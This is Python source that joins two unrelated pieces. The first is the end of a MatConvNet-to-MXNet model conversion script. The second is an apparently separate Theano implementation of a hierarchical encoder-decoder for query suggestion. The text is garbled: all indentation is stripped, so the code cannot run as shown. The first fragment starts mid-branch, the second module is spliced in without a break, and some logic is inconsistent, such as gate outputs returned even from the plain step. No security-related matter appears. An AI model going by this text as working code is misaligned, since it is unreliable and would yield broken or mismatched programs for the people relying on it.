poolSize = layer[5][0][0][1][0]
pad = layer[5][0][0][3][0]
stride = layer[5][0][0][4][0]
type_string = 'mx.symbol.Pooling'
param_string = "pooling_convention='full', "
param_string += "pad=(%d,%d), kernel=(%d,%d), stride=(%d,%d)" % (
pad[0], pad[2], poolSize[0], poolSize[1],
stride[0], stride[1])
elif layer_type == u'dagnn.ReLU':
type_string = 'mx.symbol.Activation'
param_string = "act_type='relu'"
elif layer_type == u'dagnn.Sum':
type_string = 'mx.symbol.broadcast_add'
param_string = ""
pass
else:
pass
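# Optional sanity check (not part of the original conversion script): every
# converted parameter should match the shape MXNet inferred for 'fusex' above.
for name, array in arg_params.items():
    expected = arg_shape_dic.get(name)
    if expected is not None and tuple(array.shape) != tuple(expected):
        print('arg shape mismatch for %s: %s vs %s' % (name, array.shape, expected))
for name, array in aux_params.items():
    expected = aux_shape_dic.get(name)
    if expected is not None and tuple(array.shape) != tuple(expected):
        print('aux shape mismatch for %s: %s vs %s' % (name, array.shape, expected))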
# In[126]:
fusex.save('hr101-symbol.json')
# In[127]:
model = mx.mod.Module(symbol=fusex, data_names=['data'], label_names=None)
model.bind(data_shapes=[('data', (1, 3, 224, 224))])
model.init_params(arg_params=arg_params, aux_params=aux_params)
model.save_checkpoint('hr101', 0)
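# A minimal sketch (not in the original script) of loading the converted
# checkpoint back and running a forward pass with the same input shape:
sym, arg_p, aux_p = mx.model.load_checkpoint('hr101', 0)
mod = mx.mod.Module(symbol=sym, data_names=['data'], label_names=None)
mod.bind(data_shapes=[('data', (1, 3, 224, 224))], for_training=False)
mod.set_params(arg_p, aux_p)
mod.forward(mx.io.DataBatch([mx.nd.zeros((1, 3, 224, 224))]))
score_map = mod.get_outputs()[0]  # fused score map, e.g. (1, 125, 27, 27)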
"""
Query suggestion hierarchical encoder-decoder code.
The code is inspired from nmt encdec code in groundhog
but we do not rely on groundhog infrastructure.
"""
__docformat__ = 'restructuredtext en'
__authors__ = ("Alessandro Sordoni")
__contact__ = "Alessandro Sordoni <sordonia@iro.umontreal>"
import theano
import theano.tensor as T
import numpy as np
import cPickle
import logging
logger = logging.getLogger(__name__)
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.tensor.nnet.conv3d2d import *
from collections import OrderedDict
from model import *
from utils import *
import operator
# Theano speed-up
theano.config.scan.allow_gc = False
def add_to_params(params, new_param):
params.append(new_param)
return new_param
class EncoderDecoderBase(object):
def __init__(self, state, rng, parent):
self.rng = rng
self.parent = parent
self.state = state
self.__dict__.update(state)
self.session_rec_activation = eval(self.session_rec_activation)
self.query_rec_activation = eval(self.query_rec_activation)
self.params = []
class Encoder(EncoderDecoderBase):
def init_params(self):
""" sent weights """
# embedding
self.W_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.idim, self.rankdim), name='W_emb'))
self.W_in = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in'))
self.W_hh = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='W_hh'))
self.b_hh = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_hh'))
if self.query_step_type == "gated":
self.W_in_r = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in_r'))
self.W_in_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='W_in_z'))
self.W_hh_r = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='W_hh_r'))
self.W_hh_z = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='W_hh_z'))
self.b_z = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_z'))
self.b_r = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='b_r'))
""" Context weights """
self.Ws_in = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.qdim, self.sdim), name='Ws_in'))
self.Ws_hh = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.sdim, self.sdim)), name='Ws_hh'))
self.bs_hh = add_to_params(self.params, theano.shared(value=np.zeros((self.sdim,), dtype='float32'), name='bs_hh'))
if self.session_step_type == "gated":
self.Ws_in_r = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.qdim, self.sdim), name='Ws_in_r'))
self.Ws_in_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.qdim, self.sdim), name='Ws_in_z'))
self.Ws_hh_r = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.sdim, self.sdim)), name='Ws_hh_r'))
self.Ws_hh_z = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.sdim, self.sdim)), name='Ws_hh_z'))
self.bs_z = add_to_params(self.params, theano.shared(value=np.zeros((self.sdim,), dtype='float32'), name='bs_z'))
self.bs_r = add_to_params(self.params, theano.shared(value=np.zeros((self.sdim,), dtype='float32'), name='bs_r'))
def plain_query_step(self, x_t, m_t, h_tm1, hr_tm1):
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
h_t = self.query_rec_activation(T.dot(x_t, self.W_in) + T.dot(hr_tm1, self.W_hh) + self.b_hh)
hr_t = m_t * h_t
return h_t, hr_t,
def gated_query_step(self, x_t, m_t, h_tm1, hr_tm1):
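        # Standard GRU step computed over the reset-masked previous state
        # hr_tm1: r_t and z_t are the reset and update gates, h_tilde the
        # candidate state.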
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
r_t = T.nnet.sigmoid(T.dot(x_t, self.W_in_r) + T.dot(hr_tm1, self.W_hh_r) + self.b_r)
z_t = T.nnet.sigmoid(T.dot(x_t, self.W_in_z) + T.dot(hr_tm1, self.W_hh_z) + self.b_z)
h_tilde = self.query_rec_activation(T.dot(x_t, self.W_in) + T.dot(r_t * hr_tm1, self.W_hh) + self.b_hh)
h_t = (np.float32(1.0) - z_t) * hr_tm1 + z_t * h_tilde
hr_t = m_t * h_t
# return both reset state and non-reset state
return h_t, hr_t, r_t, z_t, h_tilde
def plain_session_step(self, h_t, m_t, hs_tm1):
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
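        # m_t is 1 inside a query and 0 on the end-of-query token, so hs is
        # updated only at query boundaries and carried over unchanged elsewhere.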
hs_update = self.session_rec_activation(T.dot(h_t, self.Ws_in) + T.dot(hs_tm1, self.Ws_hh) + self.bs_hh)
hs_t = (m_t) * hs_tm1 + (1 - m_t) * hs_update
return hs_t,
def gated_session_step(self, h_t, m_t, hs_tm1):
rs_t = T.nnet.sigmoid(T.dot(h_t, self.Ws_in_r) + T.dot(hs_tm1, self.Ws_hh_r) + self.bs_r)
zs_t = T.nnet.sigmoid(T.dot(h_t, self.Ws_in_z) + T.dot(hs_tm1, self.Ws_hh_z) + self.bs_z)
hs_tilde = self.session_rec_activation(T.dot(h_t, self.Ws_in) + T.dot(rs_t * hs_tm1, self.Ws_hh) + self.bs_hh)
hs_update = (np.float32(1.) - zs_t) * hs_tm1 + zs_t * hs_tilde
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
hs_t = (m_t) * hs_tm1 + (1 - m_t) * hs_update
return hs_t, hs_tilde, rs_t, zs_t
def approx_embedder(self, x):
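        # Embedding lookup: integer indexing into the (idim, rankdim) matrix
        # returns one embedding row per token id.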
return self.W_emb[x]
def build_encoder(self, x, xmask=None, **kwargs):
one_step = False
if len(kwargs):
one_step = True
# if x.ndim == 2 then
# x = (n_steps, batch_size)
if x.ndim == 2:
batch_size = x.shape[1]
# else x = (word_1, word_2, word_3, ...)
# or x = (last_word_1, last_word_2, last_word_3, ..)
        # in this case batch_size is 1
else:
batch_size = 1
# if it is not one_step then we initialize everything to 0
if not one_step:
h_0 = T.alloc(np.float32(0), batch_size, self.qdim)
hr_0 = T.alloc(np.float32(0), batch_size, self.qdim)
hs_0 = T.alloc(np.float32(0), batch_size, self.sdim)
        # in sampling mode (i.e. one step) we require the previous states to be passed in as kwargs
else:
# in this case x.ndim != 2
assert x.ndim != 2
assert 'prev_h' in kwargs
assert 'prev_hr' in kwargs
assert 'prev_hs' in kwargs
h_0 = kwargs['prev_h']
hr_0 = kwargs['prev_hr']
hs_0 = kwargs['prev_hs']
xe = self.approx_embedder(x)
        if xmask is None:
xmask = T.neq(x, self.eoq_sym)
# Gated Encoder
if self.query_step_type == "gated":
f_enc = self.gated_query_step
o_enc_info = [h_0, hr_0, None, None, None]
else:
f_enc = self.plain_query_step
o_enc_info = [h_0, hr_0]
if self.session_step_type == "gated":
f_hier = self.gated_session_step
o_hier_info = [hs_0, None, None, None]
else:
f_hier = self.plain_session_step
o_hier_info = [hs_0]
        # Run through the whole sentence (encode everything)
if not one_step:
_res, _ = theano.scan(
f_enc, sequences=[xe, xmask], outputs_info=o_enc_info)
        # Take just one step further
else:
_res = f_enc(xe, xmask, h_0, hr_0)
# Get the hidden state sequence
h = _res[0]
hr = _res[1]
        # Now run the hierarchical (session-level) recurrence over the query states
# The hs sequence is based on the original mask
if not one_step:
_res, _ = theano.scan(
f_hier, sequences=[h, xmask], outputs_info=o_hier_info)
# Just one step further
else:
_res = f_hier(h, xmask, hs_0)
if isinstance(_res, list) or isinstance(_res, tuple):
hs = _res[0]
else:
hs = _res
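        # NOTE: the gate outputs (_res[2], _res[3]) returned below assume the
        # gated session step; the plain step produces a single output.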
return (h, hr), hs, (_res[2], _res[3])
def __init__(self, state, rng, parent):
EncoderDecoderBase.__init__(self, state, rng, parent)
self.init_params()
class Decoder(EncoderDecoderBase):
EVALUATION = 0
BEAM_SEARCH = 1
def __init__(self, state, rng, parent, encoder):
EncoderDecoderBase.__init__(self, state, rng, parent)
# Take as input the encoder instance for the embeddings..
# To modify in the future
self.encoder = encoder
self.trng = MRG_RandomStreams(self.seed)
self.init_params()
def init_params(self):
""" Decoder weights """
self.Wd_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.idim, self.rankdim), name='Wd_emb'))
self.Wd_hh = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='Wd_hh'))
self.Wd_in = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='Wd_in'))
self.bd_hh = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='bd_hh'))
self.Wd_s_0 = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, self.qdim), name='Wd_s_0'))
self.bd_s_0 = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='bd_s_0'))
if self.decoder_bias_type == 'all':
self.Wd_s_q = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, self.qdim), name='Wd_s_q'))
if self.query_step_type == "gated":
self.Wd_in_r = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='Wd_in_r'))
self.Wd_in_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, self.qdim), name='Wd_in_z'))
self.Wd_hh_r = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='Wd_hh_r'))
self.Wd_hh_z = add_to_params(self.params, theano.shared(value=OrthogonalInit(self.rng, (self.qdim, self.qdim)), name='Wd_hh_z'))
self.bd_r = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='bd_r'))
self.bd_z = add_to_params(self.params, theano.shared(value=np.zeros((self.qdim,), dtype='float32'), name='bd_z'))
if self.decoder_bias_type == 'all':
self.Wd_s_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, self.qdim), name='Wd_s_z'))
self.Wd_s_r = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, self.qdim), name='Wd_s_r'))
out_target_dim = self.qdim
if not self.maxout_out:
out_target_dim = self.rankdim
self.Wd_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.qdim, out_target_dim), name='Wd_out'))
self.bd_out = add_to_params(self.params, theano.shared(value=np.zeros((self.idim,), dtype='float32'), name='bd_out'))
# Set up deep output
if self.deep_out:
self.Wd_e_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.rankdim, out_target_dim), name='Wd_e_out'))
self.bd_e_out = add_to_params(self.params, theano.shared(value=np.zeros((out_target_dim,), dtype='float32'), name='bd_e_out'))
if self.decoder_bias_type != 'first':
self.Wd_s_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, out_target_dim), name='Wd_s_out'))
""" Rank """
if hasattr(self, 'train_rank'):
self.Wr_out = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.sdim, 1), name='Wr_out'))
self.br_out = add_to_params(self.params, theano.shared(value=np.zeros((1,), dtype='float32'), name='br_out'))
def build_rank_layer(self, hs):
return T.dot(hs, self.Wr_out) + self.br_out
def build_output_layer(self, hs, xd, hd):
pre_activ = T.dot(hd, self.Wd_out)
if self.deep_out:
pre_activ += T.dot(xd, self.Wd_e_out) + self.bd_e_out
if self.decoder_bias_type != 'first':
pre_activ += T.dot(hs, self.Wd_s_out)
# ^ if bias all, bias the deep output
if self.maxout_out:
pre_activ = Maxout(2)(pre_activ)
return pre_activ
def build_next_probs_predictor(self, hs, x, prev_hd):
"""
Return output probabilities given prev_words x, hierarchical pass hs, and previous hd
hs should always be the same (and should not be updated).
"""
return self.build_decoder(hs, x, mode=Decoder.BEAM_SEARCH, prev_hd=prev_hd)
def approx_embedder(self, x):
# Here we use the same embeddings learnt in the encoder !!!
return self.encoder.approx_embedder(x)
def output_softmax(self, pre_activ):
# returns a (timestep, bs, idim) matrix (huge)
return SoftMax(T.dot(pre_activ, self.Wd_emb.T) + self.bd_out)
def build_decoder(self, hs, x, xmask=None, y=None, y_neg=None, mode=EVALUATION, prev_hd=None, step_num=None):
# Check parameter consistency
        if mode == Decoder.EVALUATION:
            assert prev_hd is None
            assert y is not None
        else:
            assert y is None
            assert prev_hd is not None
# if mode == EVALUATION
        # xd = (timesteps, batch_size, rankdim)
#
# if mode != EVALUATION
# xd = (n_samples, dim)
xd = self.approx_embedder(x)
        if xmask is None:
xmask = T.neq(x, self.eoq_sym)
# we must zero out the </s> embedding
# i.e. the embedding x_{-1} is the 0 vector
        # as well as hd_{-1} which will be reset in the scan functions
if xd.ndim != 3:
assert mode != Decoder.EVALUATION # So only in beam search
xd = (xd.dimshuffle((1, 0)) * xmask).dimshuffle((1, 0))
else:
assert mode == Decoder.EVALUATION
xd = (xd.dimshuffle((2,0,1)) * xmask).dimshuffle((1,2,0))
# Run the decoder
if mode == Decoder.EVALUATION:
hd_init = T.alloc(np.float32(0), x.shape[1], self.qdim)
else:
hd_init = prev_hd
if self.query_step_type == "gated":
f_dec = self.gated_step
o_dec_info = [hd_init, None, None, None]
else:
f_dec = self.plain_step
o_dec_info = [hd_init]
        # If the mode of the decoder is EVALUATION
        # we evaluate the whole sentence at once,
        # i.e. xd.ndim == 3, xd = (timesteps, batch_size, rankdim)
if mode == Decoder.EVALUATION:
_res, _ = theano.scan(f_dec,
sequences=[xd, xmask, hs], \
outputs_info=o_dec_info)
# else we evaluate only one step of the recurrence using the
        # previous hidden states and the previously computed hierarchical
# states.
else:
_res = f_dec(xd, xmask, hs, prev_hd)
if isinstance(_res, list) or isinstance(_res, tuple):
hd = _res[0]
else:
hd = _res
pre_activ = self.build_output_layer(hs, xd, hd)
# EVALUATION : Return target_probs + all the predicted ranks
# target_probs.ndim == 3
if mode == Decoder.EVALUATION:
target_probs = GrabProbs(self.output_softmax(pre_activ), y)
return target_probs, hd, _res
# BEAM_SEARCH : Return output (the softmax layer) + the new hidden states
elif mode == Decoder.BEAM_SEARCH:
return self.output_softmax(pre_activ), hd
def gated_step(self, xd_t, m_t, hs_t, hd_tm1):
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
hd_tm1 = (m_t) * hd_tm1 + (1 - m_t) * self.query_rec_activation(T.dot(hs_t, self.Wd_s_0) + self.bd_s_0)
        # i.e. if m_t = 0 (end of query), hd_{t - 1} is re-initialized to tanh(Wd_s_0 hs_t + bd_s_0);
        # else (m_t = 1) hd_{t - 1} is left unchanged
# In the 'all' decoder bias type each hidden state of the decoder
# RNN receives the hs_t vector as bias without modification
if self.decoder_bias_type == 'all':
rd_t = T.nnet.sigmoid(T.dot(xd_t, self.Wd_in_r) + T.dot(hd_tm1, self.Wd_hh_r) + T.dot(hs_t, self.Wd_s_r) + self.bd_r)
zd_t = T.nnet.sigmoid(T.dot(xd_t, self.Wd_in_z) + T.dot(hd_tm1, self.Wd_hh_z) + T.dot(hs_t, self.Wd_s_z) + self.bd_z)
hd_tilde = self.query_rec_activation(T.dot(xd_t, self.Wd_in)
+ T.dot(rd_t * hd_tm1, self.Wd_hh)
+ T.dot(hs_t, self.Wd_s_q)
+ self.bd_hh)
hd_t = (np.float32(1.) - zd_t) * hd_tm1 + zd_t * hd_tilde
output = (hd_t, rd_t, zd_t, hd_tilde)
else:
# Do not bias all the decoder (force to store very useful information in the first state)
rd_t = T.nnet.sigmoid(T.dot(xd_t, self.Wd_in_r) + T.dot(hd_tm1, self.Wd_hh_r) + self.bd_r)
zd_t = T.nnet.sigmoid(T.dot(xd_t, self.Wd_in_z) + T.dot(hd_tm1, self.Wd_hh_z) + self.bd_z)
hd_tilde = self.query_rec_activation(T.dot(xd_t, self.Wd_in)
+ T.dot(rd_t * hd_tm1, self.Wd_hh)
+ self.bd_hh)
hd_t = (np.float32(1.) - zd_t) * hd_tm1 + zd_t * hd_tilde
output = (hd_t, rd_t, zd_t, hd_tilde)
return output
def plain_step(self, xd_t, m_t, hs_t, hd_tm1):
if m_t.ndim >= 1:
m_t = m_t.dimshuffle(0, 'x')
# We already assume that xd are zeroed out
hd_tm1 = (m_t) * hd_tm1 + (1 - m_t) * self.query_rec_activation(T.dot(hs_t, self.Wd_s_0) + self.bd_s_0)
        # ^ if x_{t - 1} = </s> (m_t = 0) then x_{t-1} is zeroed out
        # and hd_{t - 1} is re-initialized from hs_t; else (m_t = 1) hd_{t - 1} is left unchanged
if self.decoder_bias_type == 'first':
# Do not bias all the decoder (force to store very useful information in the first state)
hd_t = self.query_rec_activation( T.dot(xd_t, self.Wd_in)
+ T.dot(hd_tm1, self.Wd_hh)
+ self.bd_hh )
output = (hd_t,)
elif self.decoder_bias_type == 'all':
hd_t = self.query_rec_activation( T.dot(xd_t, self.Wd_in)
+ T.dot(hd_tm1, self.Wd_hh)
+ T.dot(hs_t, self.Wd_s_q)
+ self.bd_hh )
output = (hd_t,)
return output
####
class SessionEncoderDecoder(Model):
def indices_to_words(self, seq, exclude_start_end=False):
"""
        Converts a list of word ids into a list
        of words, stopping at eos_sym and optionally
        excluding the start/end-of-query symbols.
"""
def convert():
for word_index in seq:
                if word_index >= len(self.idx_to_str):
raise ValueError('Word index is too large for the model vocabulary!')
if word_index == self.eos_sym:
break
if not exclude_start_end or (word_index != self.eoq_sym and word_index != self.soq_sym):
yield self.idx_to_str[word_index]
return list(convert())
def words_to_indices(self, seq):
"""
Converts a list of words to a list
of word ids. Use unk_sym if a word is not
known.
"""
return [self.str_to_idx.get(word, self.unk_sym) for word in seq]
def compute_updates(self, training_cost, params):
updates = []
grads = T.grad(training_cost, params)
grads = OrderedDict(zip(params, grads))
# Clip stuff
        c = np.float32(self.cutoff)
clip_grads = []
norm_gs = T.sqrt(sum(T.sum(g ** 2) for p, g in grads.items()))
normalization = T.switch(T.ge(norm_gs, c), c / norm_gs, np.float32(1.))
notfinite = T.or_(T.isnan(norm_gs), T.isinf(norm_gs))
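        # Global-norm clipping: rescale all gradients so their joint L2 norm is
        # at most c; if the norm is NaN/Inf, fall back to 0.1 * p as a pseudo-
        # gradient, which shrinks the weights instead of applying a broken update.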
for p, g in grads.items():
            clip_grads.append((p, T.switch(notfinite, np.float32(.1) * p, g * normalization)))
grads = OrderedDict(clip_grads)
if self.updater == 'adagrad':
updates = Adagrad(grads, self.lr)
elif self.updater == 'sgd':
raise Exception("Sgd not implemented!")
elif self.updater == 'adadelta':
updates = Adadelta(grads)
elif self.updater == 'rmsprop':
updates = RMSProp(grads, self.lr)
elif self.updater == 'adam':
updates = Adam(grads)
else:
raise Exception("Updater not understood!")
return updates
def build_train_function(self):
if not hasattr(self, 'train_fn'):
# Compile functions
logger.debug("Building train function")
self.train_fn = theano.function(
inputs=[self.x_data, self.x_max_length, self.x_cost_mask],
outputs=self.training_cost, updates=self.updates, name="train_fn")
return self.train_fn
def build_eval_function(self):
if not hasattr(self, 'eval_fn'):
# Compile functions
logger.debug("Building evaluation function")
self.eval_fn = theano.function(inputs=[self.x_data, self.x_max_length, self.x_cost_mask],
outputs=self.training_cost, name="eval_fn")
return self.eval_fn
def build_score_function(self):
if not hasattr(self, 'score_fn'):
self.score_fn = theano.function(
inputs=[self.x_data, self.x_max_length],
outputs=[self.per_example_cost],
name="score_fn")
return self.score_fn
def build_rank_prediction_function(self):
if not hasattr(self, 'rank_fn'):
(h, hr), hs, _ = self.encoder.build_encoder(self.aug_x_data)
ranks = self.decoder.build_rank_layer(hs)
self.rank_fn = theano.function(
inputs=[self.x_data],
outputs=[ranks],
name="rank_fn")
return self.rank_fn
def build_get_states_function(self):
if not hasattr(self, 'get_states_fn'):
# Compile functions
logger.debug("Get states of the network")
            outputs = [self.h, self.hs, self.hd, self.rs, self.us] + list(self.decoder_states)
self.get_states_fn = theano.function(inputs=[self.x_data, self.x_max_length],
outputs=outputs, name="get_states_fn")
return self.get_states_fn
def build_next_probs_function(self):
if not hasattr(self, 'next_probs_fn'):
outputs, hd = self.decoder.build_next_probs_predictor(
self.beam_hs, self.beam_source, prev_hd=self.beam_hd)
self.next_probs_fn = theano.function(
inputs=[self.beam_hs, self.beam_source, self.beam_hd],
outputs=[outputs, hd],
name="next_probs_fn")
return self.next_probs_fn
def build_first_vector(self):
if not hasattr(self, 'first_vec_fn'):
(h, hr), hs, _ = self.encoder.build_encoder(self.aug_x_data)
hd0 = self.decoder.query_rec_activation(T.dot(hs, self.decoder.Wd_s_0) + self.decoder.bd_s_0)
self.first_vec_fn = theano.function(inputs=[self.x_data],
outputs=[h, hs, hd0], name="first_vec_fn")
return self.first_vec_fn
def build_encoder_function(self):
if not hasattr(self, 'encoder_fn'):
(h, hr), hs, _ = self.encoder.build_encoder(self.aug_x_data)
self.encoder_fn = theano.function(inputs=[self.x_data],
outputs=[h, hr, hs], name="encoder_fn")
return self.encoder_fn
def __init__(self, state):
Model.__init__(self)
self.state = state
# Compatibility towards older models
self.__dict__.update(state)
        self.rng = np.random.RandomState(state['seed'])
# Load dictionary
        raw_dict = cPickle.load(open(self.dictionary, 'rb'))
# Probabilities for each term in the corpus
self.noise_probs = [x[2] for x in sorted(raw_dict, key=operator.itemgetter(1))]
        self.noise_probs = np.array(self.noise_probs, dtype='float64')
        self.noise_probs /= np.sum(self.noise_probs)
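        # Smooth the unigram distribution with the 3/4 power (as in word2vec's
        # negative sampling) and renormalize.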
self.noise_probs = self.noise_probs ** 0.75
        self.noise_probs /= np.sum(self.noise_probs)
self.t_noise_probs = theano.shared(self.noise_probs.astype('float32'), 't_noise_probs')
# Dictionaries to convert str to idx and vice-versa
self.str_to_idx = dict([(tok, tok_id) for tok, tok_id, _ in raw_dict])
self.idx_to_str = dict([(tok_id, tok) for tok, tok_id, freq in raw_dict])
if '</q>' not in self.str_to_idx \
or '</s>' not in self.str_to_idx:
raise Exception("Error, malformed dictionary!")
# Number of words in the dictionary
self.idim = len(self.str_to_idx)
self.state['idim'] = self.idim
logger.debug("Initializing encoder")
self.encoder = Encoder(self.state, self.rng, self)
logger.debug("Initializing decoder")
self.decoder = Decoder(self.state, self.rng, self, self.encoder)
# Init params
self.params = self.encoder.params + self.decoder.params
assert len(set(self.params)) == (len(self.encoder.params) + len(self.decoder.params))
self.y_neg = T.itensor3('y_neg')
self.x_data = T.imatrix('x_data')
self.x_ranks = T.imatrix('x_ranks')
self.x_cost_mask = T.matrix('cost_mask')
self.x_max_length = T.iscalar('x_max_length')
        # The training is done with a trick: we prepend a special </q> token to the dialog
        # so that we can also predict the first sentence, starting from the dialog-beginning token (</q>).
self.aug_x_data = T.concatenate([T.alloc(np.int32(self.eoq_sym), 1, self.x_data.shape[1]), self.x_data])
training_x = self.aug_x_data[:self.x_max_length]
training_y = self.aug_x_data[1:self.x_max_length+1]
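        # For example (with eoq_sym = 1), a session column [5, 6, 1, 7, 8, 1]
        # becomes aug = [1, 5, 6, 1, 7, 8, 1]; training_x = aug[:max_length]
        # and training_y = aug[1:max_length+1] are next-token input/target pairs.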
training_ranks = self.x_ranks[:self.x_max_length-1].flatten()
training_ranks_mask = T.neq(training_ranks, 0).flatten()
# Here we find the end-of-sentence tokens in the minibatch.
training_hs_mask = T.neq(training_x, self.eoq_sym)
training_x_cost_mask = self.x_cost_mask[:self.x_max_length].flatten()
# Backward compatibility
if 'decoder_bias_type' in self.state:
logger.debug("Decoder bias type {}".format(self.decoder_bias_type))
logger.info("Build encoder")
(self.h, _), self.hs, (self.rs, self.us) = \
self.encoder.build_encoder(training_x, xmask=training_hs_mask)
logger.info("Build decoder (EVAL)")
target_probs, self.hd, self.decoder_states = \
self.decoder.build_decoder(self.hs, training_x, xmask=training_hs_mask, \
y=training_y, mode=Decoder.EVALUATION)
logger.info("Build rank predictor")
# self.predicted_ranks = self.decoder.build_rank_layer(self.hs)
# Prediction cost and rank cost
self.per_example_cost = -T.log2(target_probs).reshape((self.x_max_length, self.x_data.shape[1]))
# self.rank_cost = T.sum(((self.predicted_ranks[1:].flatten() - training_ranks) ** 2) * (training_ranks_mask)) / T.sum(training_ranks_mask)
self.training_cost = T.sum(-T.log2(target_probs) * training_x_cost_mask) # + np.float32(self.lambda_rank) * self.rank_cost
self.updates = self.compute_updates(self.training_cost / training_x.shape[1], self.params)
# Beam-search variables
self.beam_source = T.lvector("beam_source")
self.beam_hs = T.matrix("beam_hs")
self.beam_step_num = T.lscalar("beam_step_num")
self.beam_hd = T.matrix("beam_hd")